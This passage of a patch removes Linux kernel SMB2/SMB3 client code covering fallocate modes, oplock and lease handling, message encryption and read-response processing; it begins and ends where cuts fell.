+-				flags);
+-		if (rc < 0)
+-			goto out;
+-		if (rc == 1) {
+-			rc = 0;
+-			goto out;
+-		}
+-	}
+-
+-	if (!last_blob) {
+-		next = le64_to_cpu(out_data[num - 1].file_offset) +
+-		  le64_to_cpu(out_data[num - 1].length);
+-		len = len - (next - start);
+-		start = next;
+-		goto again;
+-	}
+-
+- out:
+-	free_xid(xid);
+-	kfree(out_data);
+-	return rc;
+-}
+-
+-static long smb3_fallocate(struct file *file, struct cifs_tcon *tcon, int mode,
+-			   loff_t off, loff_t len)
+-{
+-	/* KEEP_SIZE already checked for by do_fallocate */
+-	if (mode & FALLOC_FL_PUNCH_HOLE)
+-		return smb3_punch_hole(file, tcon, off, len);
+-	else if (mode & FALLOC_FL_ZERO_RANGE) {
+-		if (mode & FALLOC_FL_KEEP_SIZE)
+-			return smb3_zero_range(file, tcon, off, len, true);
+-		return smb3_zero_range(file, tcon, off, len, false);
+-	} else if (mode == FALLOC_FL_KEEP_SIZE)
+-		return smb3_simple_falloc(file, tcon, off, len, true);
+-	else if (mode == FALLOC_FL_COLLAPSE_RANGE)
+-		return smb3_collapse_range(file, tcon, off, len);
+-	else if (mode == FALLOC_FL_INSERT_RANGE)
+-		return smb3_insert_range(file, tcon, off, len);
+-	else if (mode == 0)
+-		return smb3_simple_falloc(file, tcon, off, len, false);
+-
+-	return -EOPNOTSUPP;
+-}
+-
+-static void
+-smb2_downgrade_oplock(struct TCP_Server_Info *server,
+-		      struct cifsInodeInfo *cinode, __u32 oplock,
+-		      unsigned int epoch, bool *purge_cache)
+-{
+-	server->ops->set_oplock_level(cinode, oplock, 0, NULL);
+-}
+-
+-static void
+-smb21_set_oplock_level(struct cifsInodeInfo *cinode, __u32 oplock,
+-		       unsigned int epoch, bool *purge_cache);
+-
+-static void
+-smb3_downgrade_oplock(struct TCP_Server_Info *server,
+-		       struct cifsInodeInfo *cinode, __u32 oplock,
+-		       unsigned int epoch, bool *purge_cache)
+-{
+-	unsigned int old_state = cinode->oplock;
+-	unsigned int old_epoch = cinode->epoch;
+-	unsigned int new_state;
+-
+-	if (epoch > old_epoch) {
+-		smb21_set_oplock_level(cinode, oplock, 0, NULL);
+-		cinode->epoch = epoch;
+-	}
+-
+-	new_state = cinode->oplock;
+-	*purge_cache = false;
+-
+-	if ((old_state & CIFS_CACHE_READ_FLG) != 0 &&
+-	    (new_state & CIFS_CACHE_READ_FLG) == 0)
+-		*purge_cache = true;
+-	else if (old_state == new_state && (epoch - old_epoch > 1))
+-		*purge_cache = true;
+-}
+-
+-static void
+-smb2_set_oplock_level(struct cifsInodeInfo *cinode, __u32 oplock,
+-		      unsigned int epoch, bool *purge_cache)
+-{
+-	oplock &= 0xFF;
+-	cinode->lease_granted = false;
+-	if (oplock == SMB2_OPLOCK_LEVEL_NOCHANGE)
+-		return;
+-	if (oplock == SMB2_OPLOCK_LEVEL_BATCH) {
+-		cinode->oplock = CIFS_CACHE_RHW_FLG;
+-		cifs_dbg(FYI, "Batch Oplock granted on inode %p\n",
+-			 &cinode->netfs.inode);
+-	} else if (oplock == SMB2_OPLOCK_LEVEL_EXCLUSIVE) {
+-		cinode->oplock = CIFS_CACHE_RW_FLG;
+-		cifs_dbg(FYI, "Exclusive Oplock granted on inode %p\n",
+-			 &cinode->netfs.inode);
+-	} else if (oplock == SMB2_OPLOCK_LEVEL_II) {
+-		cinode->oplock = CIFS_CACHE_READ_FLG;
+-		cifs_dbg(FYI, "Level II Oplock granted on inode %p\n",
+-			 &cinode->netfs.inode);
+-	} else
+-		cinode->oplock = 0;
+-}
+-
+-static void
+-smb21_set_oplock_level(struct cifsInodeInfo *cinode, __u32 oplock,
+-		       unsigned int epoch, bool *purge_cache)
+-{
+-	char message[5] = {0};
+-	unsigned int new_oplock = 0;
+-
+-	oplock &= 0xFF;
+-	cinode->lease_granted = true;
+-	if (oplock == SMB2_OPLOCK_LEVEL_NOCHANGE)
+-		return;
+-
+-	/* Check if the server granted an oplock rather than a lease */
+-	if (oplock & SMB2_OPLOCK_LEVEL_EXCLUSIVE)
+-		return smb2_set_oplock_level(cinode, oplock, epoch,
+-					     purge_cache);
+-
+-	if (oplock & SMB2_LEASE_READ_CACHING_HE) {
+-		new_oplock |= CIFS_CACHE_READ_FLG;
+-		strcat(message, "R");
+-	}
+-	if (oplock & SMB2_LEASE_HANDLE_CACHING_HE) {
+-		new_oplock |= CIFS_CACHE_HANDLE_FLG;
+-		strcat(message, "H");
+-	}
+-	if (oplock & SMB2_LEASE_WRITE_CACHING_HE) {
+-		new_oplock |= CIFS_CACHE_WRITE_FLG;
+-		strcat(message, "W");
+-	}
+-	if (!new_oplock)
+-		strncpy(message, "None", sizeof(message));
+-
+-	cinode->oplock = new_oplock;
+-	cifs_dbg(FYI, "%s Lease granted on inode %p\n", message,
+-		 &cinode->netfs.inode);
+-}
+-
+-static void
+-smb3_set_oplock_level(struct cifsInodeInfo *cinode, __u32 oplock,
+-		      unsigned int epoch, bool *purge_cache)
+-{
+-	unsigned int old_oplock = cinode->oplock;
+-
+-	smb21_set_oplock_level(cinode, oplock, epoch, purge_cache);
+-
+-	if (purge_cache) {
+-		*purge_cache = false;
+-		if (old_oplock == CIFS_CACHE_READ_FLG) {
+-			if (cinode->oplock == CIFS_CACHE_READ_FLG &&
+-			    (epoch - cinode->epoch > 0))
+-				*purge_cache = true;
+-			else if (cinode->oplock == CIFS_CACHE_RH_FLG &&
+-				 (epoch - cinode->epoch > 1))
+-				*purge_cache = true;
+-			else if (cinode->oplock == CIFS_CACHE_RHW_FLG &&
+-				 (epoch - cinode->epoch > 1))
+-				*purge_cache = true;
+-			else if (cinode->oplock == 0 &&
+-				 (epoch - cinode->epoch > 0))
+-				*purge_cache = true;
+-		} else if (old_oplock == CIFS_CACHE_RH_FLG) {
+-			if (cinode->oplock == CIFS_CACHE_RH_FLG &&
+-			    (epoch - cinode->epoch > 0))
+-				*purge_cache = true;
+-			else if (cinode->oplock == CIFS_CACHE_RHW_FLG &&
+-				 (epoch - cinode->epoch > 1))
+-				*purge_cache = true;
+-		}
+-		cinode->epoch = epoch;
+-	}
+-}
+-
+-#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
+-static bool
+-smb2_is_read_op(__u32 oplock)
+-{
+-	return oplock == SMB2_OPLOCK_LEVEL_II;
+-}
+-#endif /* CIFS_ALLOW_INSECURE_LEGACY */
+-
+-static bool
+-smb21_is_read_op(__u32 oplock)
+-{
+-	return (oplock & SMB2_LEASE_READ_CACHING_HE) &&
+-	       !(oplock & SMB2_LEASE_WRITE_CACHING_HE);
+-}
+-
+-static __le32
+-map_oplock_to_lease(u8 oplock)
+-{
+-	if (oplock == SMB2_OPLOCK_LEVEL_EXCLUSIVE)
+-		return SMB2_LEASE_WRITE_CACHING_LE | SMB2_LEASE_READ_CACHING_LE;
+-	else if (oplock == SMB2_OPLOCK_LEVEL_II)
+-		return SMB2_LEASE_READ_CACHING_LE;
+-	else if (oplock == SMB2_OPLOCK_LEVEL_BATCH)
+-		return SMB2_LEASE_HANDLE_CACHING_LE | SMB2_LEASE_READ_CACHING_LE |
+-		       SMB2_LEASE_WRITE_CACHING_LE;
+-	return 0;
+-}
+-
+-static char *
+-smb2_create_lease_buf(u8 *lease_key, u8 oplock)
+-{
+-	struct create_lease *buf;
+-
+-	buf = kzalloc(sizeof(struct create_lease), GFP_KERNEL);
+-	if (!buf)
+-		return NULL;
+-
+-	memcpy(&buf->lcontext.LeaseKey, lease_key, SMB2_LEASE_KEY_SIZE);
+-	buf->lcontext.LeaseState = map_oplock_to_lease(oplock);
+-
+-	buf->ccontext.DataOffset = cpu_to_le16(offsetof
+-					(struct create_lease, lcontext));
+-	buf->ccontext.DataLength = cpu_to_le32(sizeof(struct lease_context));
+-	buf->ccontext.NameOffset = cpu_to_le16(offsetof
+-				(struct create_lease, Name));
+-	buf->ccontext.NameLength = cpu_to_le16(4);
+-	/* SMB2_CREATE_REQUEST_LEASE is "RqLs" */
+-	buf->Name[0] = 'R';
+-	buf->Name[1] = 'q';
+-	buf->Name[2] = 'L';
+-	buf->Name[3] = 's';
+-	return (char *)buf;
+-}
+-
+-static char *
+-smb3_create_lease_buf(u8 *lease_key, u8 oplock)
+-{
+-	struct create_lease_v2 *buf;
+-
+-	buf = kzalloc(sizeof(struct create_lease_v2), GFP_KERNEL);
+-	if (!buf)
+-		return NULL;
+-
+-	memcpy(&buf->lcontext.LeaseKey, lease_key, SMB2_LEASE_KEY_SIZE);
+-	buf->lcontext.LeaseState = map_oplock_to_lease(oplock);
+-
+-	buf->ccontext.DataOffset = cpu_to_le16(offsetof
+-					(struct create_lease_v2, lcontext));
+-	buf->ccontext.DataLength = cpu_to_le32(sizeof(struct lease_context_v2));
+-	buf->ccontext.NameOffset = cpu_to_le16(offsetof
+-				(struct create_lease_v2, Name));
+-	buf->ccontext.NameLength = cpu_to_le16(4);
+-	/* SMB2_CREATE_REQUEST_LEASE is "RqLs" */
+-	buf->Name[0] = 'R';
+-	buf->Name[1] = 'q';
+-	buf->Name[2] = 'L';
+-	buf->Name[3] = 's';
+-	return (char *)buf;
+-}
+-
+-static __u8
+-smb2_parse_lease_buf(void *buf, unsigned int *epoch, char *lease_key)
+-{
+-	struct create_lease *lc = (struct create_lease *)buf;
+-
+-	*epoch = 0; /* not used */
+-	if (lc->lcontext.LeaseFlags & SMB2_LEASE_FLAG_BREAK_IN_PROGRESS_LE)
+-		return SMB2_OPLOCK_LEVEL_NOCHANGE;
+-	return le32_to_cpu(lc->lcontext.LeaseState);
+-}
+-
+-static __u8
+-smb3_parse_lease_buf(void *buf, unsigned int *epoch, char *lease_key)
+-{
+-	struct create_lease_v2 *lc = (struct create_lease_v2 *)buf;
+-
+-	*epoch = le16_to_cpu(lc->lcontext.Epoch);
+-	if (lc->lcontext.LeaseFlags & SMB2_LEASE_FLAG_BREAK_IN_PROGRESS_LE)
+-		return SMB2_OPLOCK_LEVEL_NOCHANGE;
+-	if (lease_key)
+-		memcpy(lease_key, &lc->lcontext.LeaseKey, SMB2_LEASE_KEY_SIZE);
+-	return le32_to_cpu(lc->lcontext.LeaseState);
+-}
+-
+-static unsigned int
+-smb2_wp_retry_size(struct inode *inode)
+-{
+-	return min_t(unsigned int, CIFS_SB(inode->i_sb)->ctx->wsize,
+-		     SMB2_MAX_BUFFER_SIZE);
+-}
+-
+-static bool
+-smb2_dir_needs_close(struct cifsFileInfo *cfile)
+-{
+-	return !cfile->invalidHandle;
+-}
+-
+-static void
+-fill_transform_hdr(struct smb2_transform_hdr *tr_hdr, unsigned int orig_len,
+-		   struct smb_rqst *old_rq, __le16 cipher_type)
+-{
+-	struct smb2_hdr *shdr =
+-			(struct smb2_hdr *)old_rq->rq_iov[0].iov_base;
+-
+-	memset(tr_hdr, 0, sizeof(struct smb2_transform_hdr));
+-	tr_hdr->ProtocolId = SMB2_TRANSFORM_PROTO_NUM;
+-	tr_hdr->OriginalMessageSize = cpu_to_le32(orig_len);
+-	tr_hdr->Flags = cpu_to_le16(0x01);
+-	if ((cipher_type == SMB2_ENCRYPTION_AES128_GCM) ||
+-	    (cipher_type == SMB2_ENCRYPTION_AES256_GCM))
+-		get_random_bytes(&tr_hdr->Nonce, SMB3_AES_GCM_NONCE);
+-	else
+-		get_random_bytes(&tr_hdr->Nonce, SMB3_AES_CCM_NONCE);
+-	memcpy(&tr_hdr->SessionId, &shdr->SessionId, 8);
+-}
+-
+-static void *smb2_aead_req_alloc(struct crypto_aead *tfm, const struct smb_rqst *rqst,
+-				 int num_rqst, const u8 *sig, u8 **iv,
+-				 struct aead_request **req, struct scatterlist **sgl,
+-				 unsigned int *num_sgs)
+-{
+-	unsigned int req_size = sizeof(**req) + crypto_aead_reqsize(tfm);
+-	unsigned int iv_size = crypto_aead_ivsize(tfm);
+-	unsigned int len;
+-	u8 *p;
+-
+-	*num_sgs = cifs_get_num_sgs(rqst, num_rqst, sig);
+-
+-	len = iv_size;
+-	len += crypto_aead_alignmask(tfm) & ~(crypto_tfm_ctx_alignment() - 1);
+-	len = ALIGN(len, crypto_tfm_ctx_alignment());
+-	len += req_size;
+-	len = ALIGN(len, __alignof__(struct scatterlist));
+-	len += *num_sgs * sizeof(**sgl);
+-
+-	p = kmalloc(len, GFP_ATOMIC);
+-	if (!p)
+-		return NULL;
+-
+-	*iv = (u8 *)PTR_ALIGN(p, crypto_aead_alignmask(tfm) + 1);
+-	*req = (struct aead_request *)PTR_ALIGN(*iv + iv_size,
+-						crypto_tfm_ctx_alignment());
+-	*sgl = (struct scatterlist *)PTR_ALIGN((u8 *)*req + req_size,
+-					       __alignof__(struct scatterlist));
+-	return p;
+-}
+-
+-static void *smb2_get_aead_req(struct crypto_aead *tfm, const struct smb_rqst *rqst,
+-			       int num_rqst, const u8 *sig, u8 **iv,
+-			       struct aead_request **req, struct scatterlist **sgl)
+-{
+-	unsigned int off, len, skip;
+-	struct scatterlist *sg;
+-	unsigned int num_sgs;
+-	unsigned long addr;
+-	int i, j;
+-	void *p;
+-
+-	p = smb2_aead_req_alloc(tfm, rqst, num_rqst, sig, iv, req, sgl, &num_sgs);
+-	if (!p)
+-		return NULL;
+-
+-	sg_init_table(*sgl, num_sgs);
+-	sg = *sgl;
+-
+-	/* Assumes the first rqst has a transform header as the first iov.
+-	 * I.e.
+-	 * rqst[0].rq_iov[0]  is transform header
+-	 * rqst[0].rq_iov[1+] data to be encrypted/decrypted
+-	 * rqst[1+].rq_iov[0+] data to be encrypted/decrypted
+-	 */
+-	for (i = 0; i < num_rqst; i++) {
+-		/*
+-		 * The first rqst has a transform header where the
+-		 * first 20 bytes are not part of the encrypted blob.
+-		 */
+-		for (j = 0; j < rqst[i].rq_nvec; j++) {
+-			struct kvec *iov = &rqst[i].rq_iov[j];
+-
+-			skip = (i == 0) && (j == 0) ? 20 : 0;
+-			addr = (unsigned long)iov->iov_base + skip;
+-			len = iov->iov_len - skip;
+-			sg = cifs_sg_set_buf(sg, (void *)addr, len);
+-		}
+-		for (j = 0; j < rqst[i].rq_npages; j++) {
+-			rqst_page_get_length(&rqst[i], j, &len, &off);
+-			sg_set_page(sg++, rqst[i].rq_pages[j], len, off);
+-		}
+-	}
+-	cifs_sg_set_buf(sg, sig, SMB2_SIGNATURE_SIZE);
+-
+-	return p;
+-}
+-
+-static int
+-smb2_get_enc_key(struct TCP_Server_Info *server, __u64 ses_id, int enc, u8 *key)
+-{
+-	struct TCP_Server_Info *pserver;
+-	struct cifs_ses *ses;
+-	u8 *ses_enc_key;
+-
+-	/* If server is a channel, select the primary channel */
+-	pserver = CIFS_SERVER_IS_CHAN(server) ? server->primary_server : server;
+-
+-	spin_lock(&cifs_tcp_ses_lock);
+-	list_for_each_entry(ses, &pserver->smb_ses_list, smb_ses_list) {
+-		if (ses->Suid == ses_id) {
+-			spin_lock(&ses->ses_lock);
+-			ses_enc_key = enc ? ses->smb3encryptionkey :
+-				ses->smb3decryptionkey;
+-			memcpy(key, ses_enc_key, SMB3_ENC_DEC_KEY_SIZE);
+-			spin_unlock(&ses->ses_lock);
+-			spin_unlock(&cifs_tcp_ses_lock);
+-			return 0;
+-		}
+-	}
+-	spin_unlock(&cifs_tcp_ses_lock);
+-
+-	return -EAGAIN;
+-}
+-/*
+- * Encrypt or decrypt @rqst message. @rqst[0] has the following format:
+- * iov[0]   - transform header (associate data),
+- * iov[1-N] - SMB2 header and pages - data to encrypt.
+- * On success return encrypted data in iov[1-N] and pages, leave iov[0]
+- * untouched.
+- */
+-static int
+-crypt_message(struct TCP_Server_Info *server, int num_rqst,
+-	      struct smb_rqst *rqst, int enc)
+-{
+-	struct smb2_transform_hdr *tr_hdr =
+-		(struct smb2_transform_hdr *)rqst[0].rq_iov[0].iov_base;
+-	unsigned int assoc_data_len = sizeof(struct smb2_transform_hdr) - 20;
+-	int rc = 0;
+-	struct scatterlist *sg;
+-	u8 sign[SMB2_SIGNATURE_SIZE] = {};
+-	u8 key[SMB3_ENC_DEC_KEY_SIZE];
+-	struct aead_request *req;
+-	u8 *iv;
+-	DECLARE_CRYPTO_WAIT(wait);
+-	struct crypto_aead *tfm;
+-	unsigned int crypt_len = le32_to_cpu(tr_hdr->OriginalMessageSize);
+-	void *creq;
+-
+-	rc = smb2_get_enc_key(server, le64_to_cpu(tr_hdr->SessionId), enc, key);
+-	if (rc) {
+-		cifs_server_dbg(VFS, "%s: Could not get %scryption key\n", __func__,
+-			 enc ? "en" : "de");
+-		return rc;
+-	}
+-
+-	rc = smb3_crypto_aead_allocate(server);
+-	if (rc) {
+-		cifs_server_dbg(VFS, "%s: crypto alloc failed\n", __func__);
+-		return rc;
+-	}
+-
+-	tfm = enc ? server->secmech.enc : server->secmech.dec;
+-
+-	if ((server->cipher_type == SMB2_ENCRYPTION_AES256_CCM) ||
+-		(server->cipher_type == SMB2_ENCRYPTION_AES256_GCM))
+-		rc = crypto_aead_setkey(tfm, key, SMB3_GCM256_CRYPTKEY_SIZE);
+-	else
+-		rc = crypto_aead_setkey(tfm, key, SMB3_GCM128_CRYPTKEY_SIZE);
+-
+-	if (rc) {
+-		cifs_server_dbg(VFS, "%s: Failed to set aead key %d\n", __func__, rc);
+-		return rc;
+-	}
+-
+-	rc = crypto_aead_setauthsize(tfm, SMB2_SIGNATURE_SIZE);
+-	if (rc) {
+-		cifs_server_dbg(VFS, "%s: Failed to set authsize %d\n", __func__, rc);
+-		return rc;
+-	}
+-
+-	creq = smb2_get_aead_req(tfm, rqst, num_rqst, sign, &iv, &req, &sg);
+-	if (unlikely(!creq))
+-		return -ENOMEM;
+-
+-	if (!enc) {
+-		memcpy(sign, &tr_hdr->Signature, SMB2_SIGNATURE_SIZE);
+-		crypt_len += SMB2_SIGNATURE_SIZE;
+-	}
+-
+-	if ((server->cipher_type == SMB2_ENCRYPTION_AES128_GCM) ||
+-	    (server->cipher_type == SMB2_ENCRYPTION_AES256_GCM))
+-		memcpy(iv, (char *)tr_hdr->Nonce, SMB3_AES_GCM_NONCE);
+-	else {
+-		iv[0] = 3;
+-		memcpy(iv + 1, (char *)tr_hdr->Nonce, SMB3_AES_CCM_NONCE);
+-	}
+-
+-	aead_request_set_tfm(req, tfm);
+-	aead_request_set_crypt(req, sg, sg, crypt_len, iv);
+-	aead_request_set_ad(req, assoc_data_len);
+-
+-	aead_request_set_callback(req, CRYPTO_TFM_REQ_MAY_BACKLOG,
+-				  crypto_req_done, &wait);
+-
+-	rc = crypto_wait_req(enc ? crypto_aead_encrypt(req)
+-				: crypto_aead_decrypt(req), &wait);
+-
+-	if (!rc && enc)
+-		memcpy(&tr_hdr->Signature, sign, SMB2_SIGNATURE_SIZE);
+-
+-	kfree_sensitive(creq);
+-	return rc;
+-}
+-
+-void
+-smb3_free_compound_rqst(int num_rqst, struct smb_rqst *rqst)
+-{
+-	int i, j;
+-
+-	for (i = 0; i < num_rqst; i++) {
+-		if (rqst[i].rq_pages) {
+-			for (j = rqst[i].rq_npages - 1; j >= 0; j--)
+-				put_page(rqst[i].rq_pages[j]);
+-			kfree(rqst[i].rq_pages);
+-		}
+-	}
+-}
+-
+-/*
+- * This function will initialize new_rq and encrypt the content.
+- * The first entry, new_rq[0], only contains a single iov which contains
+- * a smb2_transform_hdr and is pre-allocated by the caller.
+- * This function then populates new_rq[1+] with the content from old_rq[0+].
+- *
+- * The end result is an array of smb_rqst structures where the first structure
+- * only contains a single iov for the transform header which we then can pass
+- * to crypt_message().
+- *
+- * new_rq[0].rq_iov[0] :  smb2_transform_hdr pre-allocated by the caller
+- * new_rq[1+].rq_iov[*] == old_rq[0+].rq_iov[*] : SMB2/3 requests
+- */
+-static int
+-smb3_init_transform_rq(struct TCP_Server_Info *server, int num_rqst,
+-		       struct smb_rqst *new_rq, struct smb_rqst *old_rq)
+-{
+-	struct page **pages;
+-	struct smb2_transform_hdr *tr_hdr = new_rq[0].rq_iov[0].iov_base;
+-	unsigned int npages;
+-	unsigned int orig_len = 0;
+-	int i, j;
+-	int rc = -ENOMEM;
+-
+-	for (i = 1; i < num_rqst; i++) {
+-		npages = old_rq[i - 1].rq_npages;
+-		pages = kmalloc_array(npages, sizeof(struct page *),
+-				      GFP_KERNEL);
+-		if (!pages)
+-			goto err_free;
+-
+-		new_rq[i].rq_pages = pages;
+-		new_rq[i].rq_npages = npages;
+-		new_rq[i].rq_offset = old_rq[i - 1].rq_offset;
+-		new_rq[i].rq_pagesz = old_rq[i - 1].rq_pagesz;
+-		new_rq[i].rq_tailsz = old_rq[i - 1].rq_tailsz;
+-		new_rq[i].rq_iov = old_rq[i - 1].rq_iov;
+-		new_rq[i].rq_nvec = old_rq[i - 1].rq_nvec;
+-
+-		orig_len += smb_rqst_len(server, &old_rq[i - 1]);
+-
+-		for (j = 0; j < npages; j++) {
+-			pages[j] = alloc_page(GFP_KERNEL|__GFP_HIGHMEM);
+-			if (!pages[j])
+-				goto err_free;
+-		}
+-
+-		/* copy pages from the old */
+-		for (j = 0; j < npages; j++) {
+-			char *dst, *src;
+-			unsigned int offset, len;
+-
+-			rqst_page_get_length(&new_rq[i], j, &len, &offset);
+-
+-			dst = (char *) kmap(new_rq[i].rq_pages[j]) + offset;
+-			src = (char *) kmap(old_rq[i - 1].rq_pages[j]) + offset;
+-
+-			memcpy(dst, src, len);
+-			kunmap(new_rq[i].rq_pages[j]);
+-			kunmap(old_rq[i - 1].rq_pages[j]);
+-		}
+-	}
+-
+-	/* fill the 1st iov with a transform header */
+-	fill_transform_hdr(tr_hdr, orig_len, old_rq, server->cipher_type);
+-
+-	rc = crypt_message(server, num_rqst, new_rq, 1);
+-	cifs_dbg(FYI, "Encrypt message returned %d\n", rc);
+-	if (rc)
+-		goto err_free;
+-
+-	return rc;
+-
+-err_free:
+-	smb3_free_compound_rqst(num_rqst - 1, &new_rq[1]);
+-	return rc;
+-}
+-
+-static int
+-smb3_is_transform_hdr(void *buf)
+-{
+-	struct smb2_transform_hdr *trhdr = buf;
+-
+-	return trhdr->ProtocolId == SMB2_TRANSFORM_PROTO_NUM;
+-}
+-
+-static int
+-decrypt_raw_data(struct TCP_Server_Info *server, char *buf,
+-		 unsigned int buf_data_size, struct page **pages,
+-		 unsigned int npages, unsigned int page_data_size,
+-		 bool is_offloaded)
+-{
+-	struct kvec iov[2];
+-	struct smb_rqst rqst = {NULL};
+-	int rc;
+-
+-	iov[0].iov_base = buf;
+-	iov[0].iov_len = sizeof(struct smb2_transform_hdr);
+-	iov[1].iov_base = buf + sizeof(struct smb2_transform_hdr);
+-	iov[1].iov_len = buf_data_size;
+-
+-	rqst.rq_iov = iov;
+-	rqst.rq_nvec = 2;
+-	rqst.rq_pages = pages;
+-	rqst.rq_npages = npages;
+-	rqst.rq_pagesz = PAGE_SIZE;
+-	rqst.rq_tailsz = (page_data_size % PAGE_SIZE) ? : PAGE_SIZE;
+-
+-	rc = crypt_message(server, 1, &rqst, 0);
+-	cifs_dbg(FYI, "Decrypt message returned %d\n", rc);
+-
+-	if (rc)
+-		return rc;
+-
+-	memmove(buf, iov[1].iov_base, buf_data_size);
+-
+-	if (!is_offloaded)
+-		server->total_read = buf_data_size + page_data_size;
+-
+-	return rc;
+-}
+-
+-static int
+-read_data_into_pages(struct TCP_Server_Info *server, struct page **pages,
+-		     unsigned int npages, unsigned int len)
+-{
+-	int i;
+-	int length;
+-
+-	for (i = 0; i < npages; i++) {
+-		struct page *page = pages[i];
+-		size_t n;
+-
+-		n = len;
+-		if (len >= PAGE_SIZE) {
+-			/* enough data to fill the page */
+-			n = PAGE_SIZE;
+-			len -= n;
+-		} else {
+-			zero_user(page, len, PAGE_SIZE - len);
+-			len = 0;
+-		}
+-		length = cifs_read_page_from_socket(server, page, 0, n);
+-		if (length < 0)
+-			return length;
+-		server->total_read += length;
+-	}
+-
+-	return 0;
+-}
+-
+-static int
+-init_read_bvec(struct page **pages, unsigned int npages, unsigned int data_size,
+-	       unsigned int cur_off, struct bio_vec **page_vec)
+-{
+-	struct bio_vec *bvec;
+-	int i;
+-
+-	bvec = kcalloc(npages, sizeof(struct bio_vec), GFP_KERNEL);
+-	if (!bvec)
+-		return -ENOMEM;
+-
+-	for (i = 0; i < npages; i++) {
+-		bvec[i].bv_page = pages[i];
+-		bvec[i].bv_offset = (i == 0) ? cur_off : 0;
+-		bvec[i].bv_len = min_t(unsigned int, PAGE_SIZE, data_size);
+-		data_size -= bvec[i].bv_len;
+-	}
+-
+-	if (data_size != 0) {
+-		cifs_dbg(VFS, "%s: something went wrong\n", __func__);
+-		kfree(bvec);
+-		return -EIO;
+-	}
+-
+-	*page_vec = bvec;
+-	return 0;
+-}
+-
+-static int
+-handle_read_data(struct TCP_Server_Info *server, struct mid_q_entry *mid,
+-		 char *buf, unsigned int buf_len, struct page **pages,
+-		 unsigned int npages, unsigned int page_data_size,
+-		 bool is_offloaded)
+-{
+-	unsigned int data_offset;
+-	unsigned int data_len;
+-	unsigned int cur_off;
+-	unsigned int cur_page_idx;
+-	unsigned int pad_len;
+-	struct cifs_readdata *rdata = mid->callback_data;
+-	struct smb2_hdr *shdr = (struct smb2_hdr *)buf;
+-	struct bio_vec *bvec = NULL;
+-	struct iov_iter iter;
+-	struct kvec iov;
+-	int length;
+-	bool use_rdma_mr = false;
+-
+-	if (shdr->Command != SMB2_READ) {
+-		cifs_server_dbg(VFS, "only big read responses are supported\n");
+-		return -ENOTSUPP;
+-	}
+-
+-	if (server->ops->is_session_expired &&
+-	    server->ops->is_session_expired(buf)) {
+-		if (!is_offloaded)
+-			cifs_reconnect(server, true);
+-		return -1;
+-	}
+-
+-	if (server->ops->is_status_pending &&
+-			server->ops->is_status_pending(buf, server))
+-		return -1;
+-
+-	/* set up first two iov to get credits */
+-	rdata->iov[0].iov_base = buf;
+-	rdata->iov[0].iov_len = 0;
+-	rdata->iov[1].iov_base = buf;
+-	rdata->iov[1].iov_len =
+-		min_t(unsigned int, buf_len, server->vals->read_rsp_size);
+-	cifs_dbg(FYI, "0: iov_base=%p iov_len=%zu\n",
+-		 rdata->iov[0].iov_base, rdata->iov[0].iov_len);
+-	cifs_dbg(FYI, "1: iov_base=%p iov_len=%zu\n",
+-		 rdata->iov[1].iov_base, rdata->iov[1].iov_len);
+-
+-	rdata->result = server->ops->map_error(buf, true);
+-	if (rdata->result != 0) {
+-		cifs_dbg(FYI, "%s: server returned error %d\n",
+-			 __func__, rdata->result);
+-		/* normal error on read response */
+-		if (is_offloaded)
+-			mid->mid_state = MID_RESPONSE_RECEIVED;
+-		else
+-			dequeue_mid(mid, false);
+-		return 0;
+-	}
+-
+-	data_offset = server->ops->read_data_offset(buf);
+-#ifdef CONFIG_CIFS_SMB_DIRECT
+-	use_rdma_mr = rdata->mr;
+-#endif
+-	data_len = server->ops->read_data_length(buf, use_rdma_mr);
+-
+-	if (data_offset < server->vals->read_rsp_size) {
+-		/*
+-		 * win2k8 sometimes sends an offset of 0 when the read
+-		 * is beyond the EOF. Treat it as if the data starts just after
+-		 * the header.
+-		 */
+-		cifs_dbg(FYI, "%s: data offset (%u) inside read response header\n",
+-			 __func__, data_offset);
+-		data_offset = server->vals->read_rsp_size;
+-	} else if (data_offset > MAX_CIFS_SMALL_BUFFER_SIZE) {
+-		/* data_offset is beyond the end of smallbuf */
+-		cifs_dbg(FYI, "%s: data offset (%u) beyond end of smallbuf\n",
+-			 __func__, data_offset);
+-		rdata->result = -EIO;
+-		if (is_offloaded)
+-			mid->mid_state = MID_RESPONSE_MALFORMED;
+-		else
+-			dequeue_mid(mid, rdata->result);
+-		return 0;
+-	}
+-
+-	pad_len = data_offset - server->vals->read_rsp_size;
+-
+-	if (buf_len <= data_offset) {
+-		/* read response payload is in pages */
+-		cur_page_idx = pad_len / PAGE_SIZE;
+-		cur_off = pad_len % PAGE_SIZE;
+-
+-		if (cur_page_idx != 0) {
+-			/* data offset is beyond the 1st page of response */
+-			cifs_dbg(FYI, "%s: data offset (%u) beyond 1st page of response\n",
+-				 __func__, data_offset);
+-			rdata->result = -EIO;
+-			if (is_offloaded)
+-				mid->mid_state = MID_RESPONSE_MALFORMED;
+-			else
+-				dequeue_mid(mid, rdata->result);
+-			return 0;
+-		}
+-
+-		if (data_len > page_data_size - pad_len) {
+-			/* data_len is corrupt -- discard frame */
+-			rdata->result = -EIO;
+-			if (is_offloaded)
+-				mid->mid_state = MID_RESPONSE_MALFORMED;
+-			else
+-				dequeue_mid(mid, rdata->result);
+-			return 0;
+-		}
+-
+-		rdata->result = init_read_bvec(pages, npages, page_data_size,
+-					       cur_off, &bvec);
+-		if (rdata->result != 0) {
+-			if (is_offloaded)
+-				mid->mid_state = MID_RESPONSE_MALFORMED;
+-			else
+-				dequeue_mid(mid, rdata->result);
+-			return 0;
+-		}
+-
+-		iov_iter_bvec(&iter, ITER_SOURCE, bvec, npages, data_len);
+-	} else if (buf_len >= data_offset + data_len) {
+-		/* read response payload is in buf */
+-		WARN_ONCE(npages > 0, "read data can be either in buf or in pages");
+-		iov.iov_base = buf + data_offset;
+-		iov.iov_len = data_len;
+-		iov_iter_kvec(&iter, ITER_SOURCE, &iov, 1, data_len);
+-	} else {
+-		/* read response payload cannot be in both buf and pages */
+-		WARN_ONCE(1, "buf can not contain only a part of read data");
+-		rdata->result = -EIO;
+-		if (is_offloaded)
+-			mid->mid_state = MID_RESPONSE_MALFORMED;
+-		else
+-			dequeue_mid(mid, rdata->result);
+-		return 0;
+-	}
+-
+-	length = rdata->copy_into_pages(server, rdata, &iter);
+-
+-	kfree(bvec);
+-
+-	if (length < 0)
+-		return length;
+-
+-	if (is_offloaded)
+-		mid->mid_state = MID_RESPONSE_RECEIVED;
+-	else
+-		dequeue_mid(mid, false);
+-	return length;
+-}
+-
+-struct smb2_decrypt_work {
